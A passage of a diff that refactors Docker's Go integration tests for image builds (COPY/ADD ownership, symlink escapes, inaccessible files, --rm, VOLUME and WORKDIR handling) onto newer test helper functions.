-	ctx, err := fakeContext(`FROM busybox
-COPY test_file .`,
-		map[string]string{
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(`FROM busybox
+COPY test_file .`),
+		fakecontext.WithFiles(map[string]string{
 			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
+		}))
 	defer ctx.Close()
 
 	errChan := make(chan error)
 	go func() {
-		_, err := buildImageFromContext(name, ctx, true)
-		errChan <- err
+		errChan <- buildImage(name, build.WithExternalBuildContext(ctx)).Error
 		close(errChan)
 	}()
 	select {
@@ -1201,8 +846,8 @@ COPY test_file .`,
 
 func (s *DockerSuite) TestBuildCopySingleFileToExistDir(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopysinglefiletoexistdir"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testcopysinglefiletoexistdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN mkdir /exists
@@ -1211,24 +856,14 @@ RUN chown -R dockerio.dockerio /exists
 COPY test_file /exists/
 RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
 RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopySingleFileToNonExistDir(c *check.C) {
-	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopysinglefiletononexistdir"
-	ctx, err := fakeContext(`FROM busybox
+	testRequires(c, DaemonIsLinux) // Linux specific
+	buildImageSuccessfully(c, "testcopysinglefiletononexistdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -1236,48 +871,28 @@ RUN chown dockerio.dockerio /exists
 COPY test_file /test_dir/
 RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopyDirContentToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopydircontenttoroot"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testcopydircontenttoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
 RUN chown dockerio.dockerio exists
 COPY test_dir /
 RUN [ $(ls -l /test_file | awk '{print $3":"$4}') = 'root:root' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`,
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopyDirContentToExistDir(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopydircontenttoexistdir"
-	ctx, err := fakeContext(`FROM busybox
+	buildImageSuccessfully(c, "testcopydircontenttoexistdir", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN mkdir /exists
@@ -1286,24 +901,14 @@ RUN chown -R dockerio.dockerio /exists
 COPY test_dir/ /exists/
 RUN [ $(ls -l / | grep exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
 RUN [ $(ls -l /exists/exists_file | awk '{print $3":"$4}') = 'dockerio:dockerio' ]
-RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`,
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists/test_file | awk '{print $3":"$4}') = 'root:root' ]`),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildCopyWholeDirToRoot(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Linux specific test
-	name := "testcopywholedirtoroot"
-	ctx, err := fakeContext(fmt.Sprintf(`FROM busybox
+	buildImageSuccessfully(c, "testcopywholedirtoroot", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", fmt.Sprintf(`FROM busybox
 RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 RUN echo 'dockerio:x:1001:' >> /etc/group
 RUN touch /exists
@@ -1313,36 +918,8 @@ RUN [ $(ls -l / | grep test_dir | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l / | grep test_dir | awk '{print $1}') = 'drwxr-xr-x' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $3":"$4}') = 'root:root' ]
 RUN [ $(ls -l /test_dir/test_file | awk '{print $1}') = '%s' ]
-RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod),
-		map[string]string{
-			"test_dir/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-}
-
-func (s *DockerSuite) TestBuildCopyEtcToRoot(c *check.C) {
-	name := "testcopyetctoroot"
-
-	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
-COPY . /`,
-		map[string]string{
-			"etc/test_file": "test1",
-		})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
+RUN [ $(ls -l /exists | awk '{print $3":"$4}') = 'dockerio:dockerio' ]`, expectedFileChmod)),
+		build.WithFile("test_dir/test_file", "test1")))
 }
 
 func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) {
@@ -1357,10 +934,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) {
 	var (
 		name = "test-link-absolute"
 	)
-	ctx, err := fakeContext(dockerfile, nil)
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile))
 	defer ctx.Close()
 
 	tempDir, err := ioutil.TempDir("", "test-link-absolute-temp-")
@@ -1421,10 +995,7 @@ func (s *DockerSuite) TestBuildAddBadLinks(c *check.C) {
 		c.Fatal(err)
 	}
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 	if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) {
 		c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile)
 	}
@@ -1455,10 +1026,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) {
 	dockerfile = fmt.Sprintf(dockerfileTemplate, tempDir)
 	nonExistingFile := filepath.Join(tempDir, targetFile)
 
-	ctx, err := fakeContext(dockerfile, nil)
-	if err != nil {
-		c.Fatal(err)
-	}
+	ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile))
 	defer ctx.Close()
 	fooPath := filepath.Join(ctx.Dir, targetFile)
 
@@ -1472,10 +1040,7 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) {
 		c.Fatal(err)
 	}
 
-	if _, err := buildImageFromContext(name, ctx, true); err != nil {
-		c.Fatal(err)
-	}
-
+	buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 	if _, err := os.Stat(nonExistingFile); err == nil || err != nil && !os.IsNotExist(err) {
 		c.Fatalf("%s shouldn't have been written and it shouldn't exist", nonExistingFile)
 	}
@@ -1485,84 +1050,83 @@ func (s *DockerSuite) TestBuildAddBadLinksVolume(c *check.C) {
 // Issue #5270 - ensure we throw a better error than "unexpected EOF"
 // when we can't access files in the context.
 func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) {
-	testRequires(c, DaemonIsLinux, UnixCli) // test uses chown/chmod: not available on windows
+	testRequires(c, DaemonIsLinux, UnixCli, SameHostDaemon) // test uses chown/chmod: not available on windows
 
 	{
 		name := "testbuildinaccessiblefiles"
-		ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"fileWithoutReadAccess": "foo"})
-		if err != nil {
-			c.Fatal(err)
-		}
+		ctx := fakecontext.New(c, "",
+			fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"),
+			fakecontext.WithFiles(map[string]string{"fileWithoutReadAccess": "foo"}),
+		)
 		defer ctx.Close()
 		// This is used to ensure we detect inaccessible files early during build in the cli client
 		pathToFileWithoutReadAccess := filepath.Join(ctx.Dir, "fileWithoutReadAccess")
 
-		if err = os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil {
+		if err := os.Chown(pathToFileWithoutReadAccess, 0, 0); err != nil {
 			c.Fatalf("failed to chown file to root: %s", err)
 		}
-		if err = os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil {
+		if err := os.Chmod(pathToFileWithoutReadAccess, 0700); err != nil {
 			c.Fatalf("failed to chmod file to 700: %s", err)
 		}
-		buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name))
-		buildCmd.Dir = ctx.Dir
-		out, _, err := runCommandWithOutput(buildCmd)
-		if err == nil {
-			c.Fatalf("build should have failed: %s %s", err, out)
+		result := icmd.RunCmd(icmd.Cmd{
+			Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)},
+			Dir:     ctx.Dir,
+		})
+		if result.Error == nil {
+			c.Fatalf("build should have failed: %s %s", result.Error, result.Combined())
 		}
 
 		// check if we've detected the failure before we started building
-		if !strings.Contains(out, "no permission to read from ") {
-			c.Fatalf("output should've contained the string: no permission to read from but contained: %s", out)
+		if !strings.Contains(result.Combined(), "no permission to read from ") {
+			c.Fatalf("output should've contained the string: no permission to read from but contained: %s", result.Combined())
 		}
 
-		if !strings.Contains(out, "Error checking context") {
-			c.Fatalf("output should've contained the string: Error checking context")
+		if !strings.Contains(result.Combined(), "error checking context") {
+			c.Fatalf("output should've contained the string: error checking context")
 		}
 	}
 	{
 		name := "testbuildinaccessibledirectory"
-		ctx, err := fakeContext("FROM scratch\nADD . /foo/", map[string]string{"directoryWeCantStat/bar": "foo"})
-		if err != nil {
-			c.Fatal(err)
-		}
+		ctx := fakecontext.New(c, "",
+			fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"),
+			fakecontext.WithFiles(map[string]string{"directoryWeCantStat/bar": "foo"}),
+		)
 		defer ctx.Close()
 		// This is used to ensure we detect inaccessible directories early during build in the cli client
 		pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat")
 		pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar")
 
-		if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
+		if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
 			c.Fatalf("failed to chown directory to root: %s", err)
 		}
-		if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
+		if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
 			c.Fatalf("failed to chmod directory to 444: %s", err)
 		}
-		if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
+		if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
 			c.Fatalf("failed to chmod file to 700: %s", err)
 		}
 
-		buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name))
-		buildCmd.Dir = ctx.Dir
-		out, _, err := runCommandWithOutput(buildCmd)
-		if err == nil {
-			c.Fatalf("build should have failed: %s %s", err, out)
+		result := icmd.RunCmd(icmd.Cmd{
+			Command: []string{"su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name)},
+			Dir:     ctx.Dir,
+		})
+		if result.Error == nil {
+			c.Fatalf("build should have failed: %s %s", result.Error, result.Combined())
 		}
 
 		// check if we've detected the failure before we started building
-		if !strings.Contains(out, "can't stat") {
-			c.Fatalf("output should've contained the string: can't access %s", out)
+		if !strings.Contains(result.Combined(), "can't stat") {
+			c.Fatalf("output should've contained the string: can't access %s", result.Combined())
 		}
 
-		if !strings.Contains(out, "Error checking context") {
-			c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out)
+		if !strings.Contains(result.Combined(), "error checking context") {
+			c.Fatalf("output should've contained the string: error checking context\ngot:%s", result.Combined())
 		}
 
 	}
 	{
 		name := "testlinksok"
-		ctx, err := fakeContext("FROM scratch\nADD . /foo/", nil)
-		if err != nil {
-			c.Fatal(err)
-		}
+		ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"))
 		defer ctx.Close()
 
 		target := "../../../../../../../../../../../../../../../../../../../azA"
@@ -1572,31 +1136,28 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) {
 		defer os.Remove(target)
 		// This is used to ensure we don't follow links when checking if everything in the context is accessible
 		// This test doesn't require that we run commands as an unprivileged user
-		if _, err := buildImageFromContext(name, ctx, true); err != nil {
-			c.Fatal(err)
-		}
+		buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx))
 	}
 	{
 		name := "testbuildignoredinaccessible"
-		ctx, err := fakeContext("FROM scratch\nADD . /foo/",
-			map[string]string{
+		ctx := fakecontext.New(c, "",
+			fakecontext.WithDockerfile("FROM scratch\nADD . /foo/"),
+			fakecontext.WithFiles(map[string]string{
 				"directoryWeCantStat/bar": "foo",
 				".dockerignore":           "directoryWeCantStat",
-			})
-		if err != nil {
-			c.Fatal(err)
-		}
+			}),
+		)
 		defer ctx.Close()
 		// This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern
 		pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat")
 		pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar")
-		if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
+		if err := os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
 			c.Fatalf("failed to chown directory to root: %s", err)
 		}
-		if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
+		if err := os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
 			c.Fatalf("failed to chmod directory to 444: %s", err)
 		}
-		if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
+		if err := os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
 			c.Fatalf("failed to chmod file to 700: %s", err)
 		}
 
@@ -1610,27 +1171,18 @@ func (s *DockerSuite) TestBuildWithInaccessibleFilesInContext(c *check.C) {
 }
 
 func (s *DockerSuite) TestBuildForceRm(c *check.C) {
-	containerCountBefore, err := getContainerCount()
-	if err != nil {
-		c.Fatalf("failed to get the container count: %s", err)
-	}
+	containerCountBefore := getContainerCount(c)
 	name := "testbuildforcerm"
 
-	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+	r := buildImage(name, cli.WithFlags("--force-rm"), build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 	RUN true
-	RUN thiswillfail`, nil)
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-
-	dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".")
-
-	containerCountAfter, err := getContainerCount()
-	if err != nil {
-		c.Fatalf("failed to get the container count: %s", err)
+	RUN thiswillfail`)))
+	if r.ExitCode != 1 && r.ExitCode != 127 { // different on Linux / Windows
+		c.Fatalf("Wrong exit code")
 	}
 
+	containerCountAfter := getContainerCount(c)
 	if containerCountBefore != containerCountAfter {
 		c.Fatalf("--force-rm shouldn't have left containers behind")
 	}
@@ -1640,84 +1192,45 @@ func (s *DockerSuite) TestBuildForceRm(c *check.C) {
 func (s *DockerSuite) TestBuildRm(c *check.C) {
 	name := "testbuildrm"
 
-	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
-	ADD foo /
-	ADD foo /`, map[string]string{"foo": "bar"})
-	if err != nil {
-		c.Fatal(err)
+	testCases := []struct {
+		buildflags                []string
+		shouldLeftContainerBehind bool
+	}{
+		// Default case (i.e. --rm=true)
+		{
+			buildflags:                []string{},
+			shouldLeftContainerBehind: false,
+		},
+		{
+			buildflags:                []string{"--rm"},
+			shouldLeftContainerBehind: false,
+		},
+		{
+			buildflags:                []string{"--rm=false"},
+			shouldLeftContainerBehind: true,
+		},
 	}
-	defer ctx.Close()
-	{
-		containerCountBefore, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
-		}
 
-		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".")
+	for _, tc := range testCases {
+		containerCountBefore := getContainerCount(c)
 
-		if err != nil {
-			c.Fatal("failed to build the image", out)
-		}
+		buildImageSuccessfully(c, name, cli.WithFlags(tc.buildflags...), build.WithDockerfile(`FROM busybox
+	RUN echo hello world`))
 
-		containerCountAfter, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
+		containerCountAfter := getContainerCount(c)
+		if tc.shouldLeftContainerBehind {
+			if containerCountBefore == containerCountAfter {
+				c.Fatalf("flags %v should have left containers behind", tc.buildflags)
+			}
+		} else {
+			if containerCountBefore != containerCountAfter {
+				c.Fatalf("flags %v shouldn't have left containers behind", tc.buildflags)
+			}
 		}
 
-		if containerCountBefore != containerCountAfter {
-			c.Fatalf("-rm shouldn't have left containers behind")
-		}
-		deleteImages(name)
+		dockerCmd(c, "rmi", name)
 	}
-
-	{
-		containerCountBefore, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
-		}
-
-		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".")
-
-		if err != nil {
-			c.Fatal("failed to build the image", out)
-		}
-
-		containerCountAfter, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
-		}
-
-		if containerCountBefore != containerCountAfter {
-			c.Fatalf("--rm shouldn't have left containers behind")
-		}
-		deleteImages(name)
-	}
-
-	{
-		containerCountBefore, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
-		}
-
-		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".")
-
-		if err != nil {
-			c.Fatal("failed to build the image", out)
-		}
-
-		containerCountAfter, err := getContainerCount()
-		if err != nil {
-			c.Fatalf("failed to get the container count: %s", err)
-		}
-
-		if containerCountBefore == containerCountAfter {
-			c.Fatalf("--rm=false should have left containers behind")
-		}
-		deleteImages(name)
-
-	}
-
-}
+}
 
 func (s *DockerSuite) TestBuildWithVolumes(c *check.C) {
 	testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows
@@ -1736,27 +1249,18 @@ func (s *DockerSuite) TestBuildWithVolumes(c *check.C) {
 			"/test8]": emptyMap,
 		}
 	)
-	_, err := buildImage(name,
-		`FROM scratch
+
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch
 		VOLUME /test1
 		VOLUME /test2
     VOLUME /test3 /test4
     VOLUME ["/test5", "/test6"]
     VOLUME [/test7 /test8]
-    `,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
-	res := inspectFieldJSON(c, name, "Config.Volumes")
+    `))
 
-	err = json.Unmarshal([]byte(res), &result)
-	if err != nil {
-		c.Fatal(err)
-	}
+	inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result)
 
 	equal := reflect.DeepEqual(&result, &expected)
-
 	if !equal {
 		c.Fatalf("Volumes %s, expected %s", result, expected)
 	}
@@ -1766,14 +1270,10 @@ func (s *DockerSuite) TestBuildWithVolumes(c *check.C) {
 func (s *DockerSuite) TestBuildMaintainer(c *check.C) {
 	name := "testbuildmaintainer"
 
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio`))
+
 	expected := "dockerio"
-	_, err := buildImage(name,
-		`FROM `+minimalBaseImage()+`
-        MAINTAINER dockerio`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
 	res := inspectField(c, name, "Author")
 	if res != expected {
 		c.Fatalf("Maintainer %s, expected %s", res, expected)
@@ -1784,15 +1284,10 @@ func (s *DockerSuite) TestBuildUser(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	name := "testbuilduser"
 	expected := "dockerio"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
 		USER dockerio
-		RUN [ $(whoami) = 'dockerio' ]`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		RUN [ $(whoami) = 'dockerio' ]`))
 	res := inspectField(c, name, "Config.User")
 	if res != expected {
 		c.Fatalf("User %s, expected %s", res, expected)
@@ -1810,7 +1305,7 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) {
 		expectedFinal string
 	)
 
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected1 = `C:/`
 		expected2 = `C:/test1`
 		expected3 = `C:/test2`
@@ -1824,19 +1319,15 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) {
 		expectedFinal = `/test2/test3`
 	}
 
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		RUN sh -c "[ "$PWD" = "`+expected1+`" ]"
 		WORKDIR test1
 		RUN sh -c "[ "$PWD" = "`+expected2+`" ]"
 		WORKDIR /test2
 		RUN sh -c "[ "$PWD" = "`+expected3+`" ]"
 		WORKDIR test3
-		RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`))
+
 	res := inspectField(c, name, "Config.WorkingDir")
 	if res != expectedFinal {
 		c.Fatalf("Workdir %s, expected %s", res, expectedFinal)
@@ -1847,30 +1338,23 @@ func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) {
 // Windows semantics. Most path handling verifications are in unit tests
 func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) {
 	testRequires(c, DaemonIsWindows)
-	name := "testbuildwindowsworkdirprocessing"
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, "testbuildwindowsworkdirprocessing", build.WithDockerfile(`FROM busybox
 		WORKDIR C:\\foo
 		WORKDIR bar
 		RUN sh -c "[ "$PWD" = "C:/foo/bar" ]"
-		`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		`))
 }
 
 // #22181 Regression test. Most paths handling verifications are in unit test.
 // One functional test for end-to-end
 func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) {
 	testRequires(c, DaemonIsWindows)
-	name := "testbuildwindowsaddcopypathprocessing"
 	// TODO Windows (@jhowardmsft). Needs a follow-up PR to 22181 to
 	// support backslash such as .\\ being equivalent to ./ and c:\\ being
 	// equivalent to c:/. This is not currently (nor ever has been) supported
 	// by docker on the Windows platform.
-	dockerfile := `
-		FROM busybox
+	buildImageSuccessfully(c, "testbuildwindowsaddcopypathprocessing", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 			# No trailing slash on COPY/ADD
 			# Results in dir being changed to a file
 			WORKDIR /wc1
@@ -1888,43 +1372,29 @@ func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) {
 			ADD wd2 c:/wd2/
 			RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]"
 			RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]"
-			`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"wc1": "hellowc1",
-		"wc2": "worldwc2",
-		"wd1": "hellowd1",
-		"wd2": "worldwd2",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	_, err = buildImageFromContext(name, ctx, false)
-	if err != nil {
-		c.Fatal(err)
-	}
+			`),
+		build.WithFile("wc1", "hellowc1"),
+		build.WithFile("wc2", "worldwc2"),
+		build.WithFile("wd1", "hellowd1"),
+		build.WithFile("wd2", "worldwd2"),
+	))
 }
 
 func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) {
 	name := "testbuildworkdirwithenvvariables"
 
 	var expected string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = `C:\test1\test2`
 	} else {
 		expected = `/test1/test2`
 	}
 
-	_, err := buildImage(name,
-		`FROM busybox
+	buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox
 		ENV DIRPATH /test1
 		ENV SUBDIRNAME test2
 		WORKDIR $DIRPATH
-		WORKDIR $SUBDIRNAME/$MISSING_VAR`,
-		true)
-	if err != nil {
-		c.Fatal(err)
-	}
+		WORKDIR $SUBDIRNAME/$MISSING_VAR`))
 	res := inspectField(c, name, "Config.WorkingDir")
 	if res != expected {
 		c.Fatalf("Workdir %s, expected %s", res, expected)
@@ -1936,18 +1406,17 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) {
 	testRequires(c, NotUserNamespace)
 
 	var expected string
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		expected = `C:/test1/test2`
 	} else {
 		expected = `/test1/test2`
 	}
 
-	name := "testbuildrelativecopy"
-	dockerfile := `
-		FROM busybox
+	buildImageSuccessfully(c, "testbuildrelativecopy", build.WithBuildContext(c,
+		build.WithFile("Dockerfile", `FROM busybox
 			WORKDIR /test1
 			WORKDIR test2
-			RUN sh -c "[ "$PWD" = '` + expected + `' ]"
+			RUN sh -c "[ "$PWD" = '`+expected+`' ]"
 			COPY foo ./
 			RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]"
 			ADD foo ./bar/baz
@@ -1965,53 +1434,38 @@ func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) {
 			WORKDIR /test5/test6
 			COPY foo ../
 			RUN sh -c "[ $(cat /test5/foo) = 'hello' ]"
-			`
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"foo": "hello",
-	})
-	if err != nil {
-		c.Fatal(err)
-	}
-	defer ctx.Close()
-	_, err = buildImageFromContext(name, ctx, false)
-	if err != nil {
-		c.Fatal(err)
-	}
+			`),
+		build.WithFile("foo", "hello"),
+	))
 }
 
+// FIXME(vdemeester) should be unit test
 func (s *DockerSuite) TestBuildBlankName(c *check.C) {
 	name := "testbuildblankname"
-	_, _, stderr, err := buildImageWithStdoutStderr(name,
-		`FROM busybox
-		ENV =`,
-		true)
-	if err == nil {
-		c.Fatal("Build was supposed to fail but didn't")
-	}
-	if !strings.Contains(stderr, "ENV names can not be blank") {
-		c.Fatalf("Missing error message, got: %s", stderr)
-	}
-
-	_, _, stderr, err = buildImageWithStdoutStderr(name,
-		`FROM busybox
-		LABEL =`,
-		true)
-	if err == nil {
-		c.Fatal("Build was supposed to fail but didn't")
-	}
-	if !strings.Contains(stderr, "LABEL names can not be blank") {
-		c.Fatalf("Missing error message, got: %s", stderr)
+	testCases := []struct {
+		expression     string
+		expectedStderr string
+	}{
+		{
+			expression:     "ENV =",
+			expectedStderr: "ENV names can not be blank",
+		},
+		{
+			expression:     "LABEL =",
+			expectedStderr: "LABEL names can not be blank",
+		},
+		{
+			expression:     "ARG =foo",
+			expectedStderr: "ARG names can not be blank",
+		},
 	}
 
-	_, _, stderr, err = buildImageWithStdoutStderr(name,
-		`FROM busybox
-		ARG =foo`,
-		true)
-	if err == nil {
-		c.Fatal("Build was supposed to fail but didn't")
-	}
-	if !strings.Contains(stderr, "ARG names can not be blank") {
-		c.Fatalf("Missing error message, got: %s", stderr)
+	for _, tc := range testCases {
